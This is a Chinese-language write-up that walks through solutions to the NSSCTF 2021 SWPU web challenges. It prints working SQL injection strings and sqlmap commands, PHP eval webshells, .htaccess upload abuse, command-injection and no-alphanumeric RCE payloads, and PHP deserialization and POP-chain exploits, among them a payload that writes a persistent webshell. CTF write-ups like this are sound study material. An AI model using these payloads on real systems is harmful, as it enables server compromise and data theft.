【NSSCTF】2021SWPU-web

[TOC]

SWPU:

web:

gift_F12:

直接查看源码：

easy_md5

数组绕过

 <?php 
 highlight_file(__FILE__);
 include 'flag2.php';
 
if (isset($_GET['name']) && isset($_POST['password'])){
    $name = $_GET['name'];
    $password = $_POST['password'];
    if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    }
    else {
        echo "wrong!";
    }
 
}
else {
    echo 'wrong!';
}
?>
NSSCTF{d54f06fb-cd78-4632-924e-2f78f30c0b17}

这次真的学到了！！！

关于MD5函数代码审计：

https://blog.csdn.net/qq_42777804/article/details/90547641

easy_sql:

sqlmap一把梭

current database: ‘test_db’

第二种：手注！

这个题真的很easy，结果我整偏了，最后搞报错注入！

union联合注入

首先测试order by 查字段：

/?wllm=1'order by 1--+		T
/?wllm=1'order by 2--+		T
/?wllm=1'order by 3--+		T
/?wllm=1'order by 4--+		F

一共有三列。

接着查数据库：

/?wllm=-1'union select 1,database(),3 --+

数据库为test_db

然后查数据库中的表名：

/?wllm=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test_db'--+

爆表：

?wllm=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘test_db’ and table_name=‘test_tb’ --+

test_tb一共有两个字段，flag和id。

最后获取flag:

?wllm=-1'union select 1,database(),flag from test_tb --+

jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

直接构造：

payload： /?json={"x":"wllm"}
post:id-wllmNB

这个题考察json格式，很简单。

caidao:

题目中给了提示，直接连接菜刀 wllm，

do you know http:

直接修改用户代理为wllm。

./uplo4d/bd914ca4997d34857501cefab0064162.phtml

RA+K+8ei+_sf

easyupload1.0

典型的文件上传：

传图片成功：

修改Content-Type: image/jpeg

可以成功传马

<?php @eval($_POST['dccomics'])?>

连接蚁剑对应目录：http://1.14.71.254:28126/upload/shell.php

显示成功：

找到了flag.php，但是是假的：

真的flag在environment环境变量中，再打上去一个可以执行phpinfo()的文件就行（因为php被禁了，自然是要绕过）

phtml也被过滤了

上传一个system.jpg:

GIF89a
<script language='php'>system(phpinfo());
</script>

记得改为php文件就行：

在蚁剑里刷新一下就行：

在网页里访问system.php:

平台老出bug，解决不了，哭了

突然上传成功了! happy!!!

easyupload2.0

这道题可以用phtml直接打：

GIF89a
<?php @eval($_POST['dccomics']);?>

easy-rce

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>

通过代码块可得：

必须有url变量，并且eval变量所对应的内容会被get方法传参给eval()函数得到回响。

?url=system("ls /");

?url=system("cat /flllllaaaaaaggggggg");

baby-rce

http://9511-5105c14c-fe3b-4356.nss.ctfer.vip:9080/rasalghul.php/?url=ls${IFS}/

http://9511-5105c14c-fe3b-4356.nss.ctfer.vip:9080/rasalghul.php/?url=cat${IFS}/flllllaaaaaaggggggg

ez_unserialize

源码：

使用dirsearch进行扫描：

查询robots.txt

源码：

<?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

CTF序列化与反序列化

原链接

代码中是一个主类wllm,有两个变量$admin和passwd
需要满足：
admin：admin
passwd:ctf
构造：p=O:4:“wllm”:2:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:3:“ctf”;}

这个题没有用到GC机制，所以不用将变量数修改为3或其他大于3的数字。

include

题目中说让上传一个文件

源码：

<?php
ini_set("allow_url_include","on");
header("Content-type: text/html; charset=utf-8");
error_reporting(0);
$file=$_GET['file'];
if(isset($file)){
    show_source(__FILE__);
    echo 'flag 在flag.php中';
}else{
    echo "传入一个file试试";
}
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
echo "</br>";
include_once($file);
?> flag 在flag.php中

这道题就是一个简单的php伪协议：

?file=php://filter/convert.base64-encode/resource=flag.php

pgsql: sql injection quine

error

这道题是一道sql注入

方法1：SQLMAP一把梭

爆库:
sqlmap -u http://1.14.71.254:28055/index.php?id=1 --dbs

爆表:
sqlmap -u http://1.14.71.254:28055/index.php?id=1 -D test_db --tables

爆字段:
sqlmap -u http://1.14.71.254:28055/index.php?id=1 -D test_db -T test_tb --columns

爆FLAG:
sqlmap -u http://1.14.71.254:28055/index.php?id=1 -D test_db -T test_tb -C flag --dump

方法2：报错注入

爆库:

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from 
information_schema.tables where table_schema=database())),1) --+

爆表：

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from 
information_schema.columns where table_schema=database() and 
table_name='test_tb')),1) --+

查flag:
1' and updatexml(1,concat(0x7e,(select flag from test_tb)),1) --+

但是只查到前半段：

update存在位数限制，使用substr()进行截取后半段：

1' and updatexml(1,concat(0x7e,substr((select flag from test_tb),32,64)),1) --+

no_wakeup

首先是一个非常萌的派蒙，打开是代码审计，一个字，审！

 <?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{


        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

?> 

代码中一共有一个HaHaHa类，其中有admin和passwd两个公共变量，只要执行到__destruct()方法就可以得到flag。

难点：绕过__wakeup()方法

这是一个典型的漏洞：CVE-2016-7124

只需要对象那个属性的值大于真实属性的个数就OK。

将Object后面的2改成3就可以了。

O:6:“HaHaHa”:3:{s:5:“admin”;s:5:“admin”;s:6:“passwd”;s:4:“wllm”;}

感谢师傅：vscode+phpstudy

easyupload3.0

这是一道文件上传的题，通过随意注错发现：

中间件是Apache/2.4.7，于是想到题目中title说试试和某些文件配合，使用.htaccess来getshell:

首先先上传一个.htaccess文件：

<FilesMatch "dc"> 
    SetHandler application/x-httpd-php
</FilesMatch>

这个文件是分布式配置文件，只要AllowOverride All就可以执行，执行的内容是所有上传文件中带有dc的文件均以php文件执行。（但是我最开始是上传不了的，只能更改后缀匹配，事实上执行内容不仅仅匹配后缀，而是全局匹配。因此上传的文件有无后缀无所谓。）

接着上传图片马：

可以验证一下是否执行：

没有显示不可显示就说明成功了！

然后就该蚁剑上场：

打进来了！

得到flag.

finalrce

无回显RCE

第一种：反弹shell
第二种：dnslog外带数据法
第三种：linux将输出结果写入文件

这里过滤了大部分的反弹shell。

但因为靶机不能连接外网，所以使用方法三。

首先生成目录文件：
dir / | tee wllm

url=l\s / | tee 1.txt

访问文件：

找到flag,使用tac代替cat,但是la被过滤，使用？代替。

?url=tac /flllll?aaaaaggggggg |tee wllm

url=tac /flllll\aaaaaaggggggg | tee 2.txt

hardrce

大佬博客：无字母数字RCE

羽师傅

无字母RCE

不能用^符号，这里用到了取反，因为~没被过滤

取反一般用到的都是不可见字符，不会触发正则表达式：

使用套神给的脚本：

s = "ls"
for i in range(len(s)):
    print('%'+str(hex((255)-ord(s[i]))[2:]),end='')

首先使用

?wllm=phpinfo();
?wllm=~(~%8F%97%8F%96%91%99%90)();

?wllm=system(ls /)
?wllm=~(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

?wllm=system(cat /flllllaaaaaaggggggg);
?wllm=~(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

pop

 <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?> 

这里有三个类，其中能够直接调用的魔术方法只有destruct，拥有该方法的w22m类只有w00m这个
变量，但这里pop的魅力就来了，如果让w00m这个变量赋值为一个对象，触发toString的一个方式
中就有
echo一个对象，于是就让w22m中的w00m这个属性赋值为w33m这个对象，同理通过w33m
中的这句
$this->w00m->{$this->w22m}()来跳到w44m中的Getflag从而到达控制变量的效果.

这个题目需要自己多理解！！！

payload:

?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D;

PseudoProtocols

php伪协议：

?wllm=php://filter/read=convert.base64-encode/resource=hint.php

经过base64解码：

进入目录：

file_get_contents（）如何绕过？

sql

?wllm=-1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_
schema.tables/**/where/**/table_schema/**/like/**/database()||'

-1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()/**/having/**/'1'/**/like/**/'1

Your Login name:LTLT_flag,users
Your Password:3

?wllm=
-1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/database()/**/having/**/'1'/**/like/**/'1

Your Login name:id,flag,id,username,
Your Password:3

?wllm=-1'/**/union/**/select/**/1,database(),flag/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1

这里由于禁了right,使用mid()

-1'/**/union/**/select/**/1,database(),mid(flag,1,40)/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1

-1'/**/union/**/select/**/1,database(),mid(flag,15,40)/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1

-1'/**/union/**/select/**/1,database(),mid(flag,25,40)/**/from/**/LTLT_flag/**/having/**/'1'/**/like/**/'1

NSSCTF{913183bf-4237-46ee-87fc-bf5cea266562}

babyunser

upload/5ad7c2191968b93f121869cd84f4e1b0.txt
file=phar://upload/5ad7c2191968b93f121869cd84f4e1b0.txt&method=write&var=conte
nt&cmd=ls

hardrce_3

这道题使用自增：

%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B'!'%3D%3D'%40'%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D'_'%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B

POST：
_=file_put_contents("1.php","<?php eval(\$_REQUEST[1]);");